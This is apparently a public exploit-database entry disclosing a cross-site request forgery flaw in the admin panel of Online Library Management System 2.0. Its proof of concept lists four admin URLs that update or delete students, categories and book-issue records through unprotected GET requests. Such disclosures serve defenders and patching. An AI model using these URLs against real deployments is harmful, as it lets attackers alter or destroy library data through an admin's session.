Exploit for Online Library Management System 2.0 Cross Site Request Forgery

## https://sploitus.com/exploit?id=PACKETSTORM:163141
# Exploit Title: Online Library Management System  
# Date:15/06/2021  
# Exploit Author : Mohit Dabas  
# Vendor Homepage : https://phpgurukul.com  
# Software Link : https://phpgurukul.com/online-library-management-system/  
# Version: 2.0  
# Tested on : LAMPP  
  
# Description #  
  
Online Library Management System has got CSRF in admin panel .Wherever the admin can update or delete option the CSRF exists.  
Following are the Example URLs  
  
# Proof of Concept (PoC) : Exploit #  
  
http://127.0.0.1:8080/library/admin/reg-students.php?id=12  
http://127.0.0.1:8080/library/admin/edit-category.php?catid=4  
http://127.0.0.1:8080/library/admin/manage-categories.php?del=4  
http://127.0.0.1:8080/library/admin/update-issue-bookdeails.php?rid=6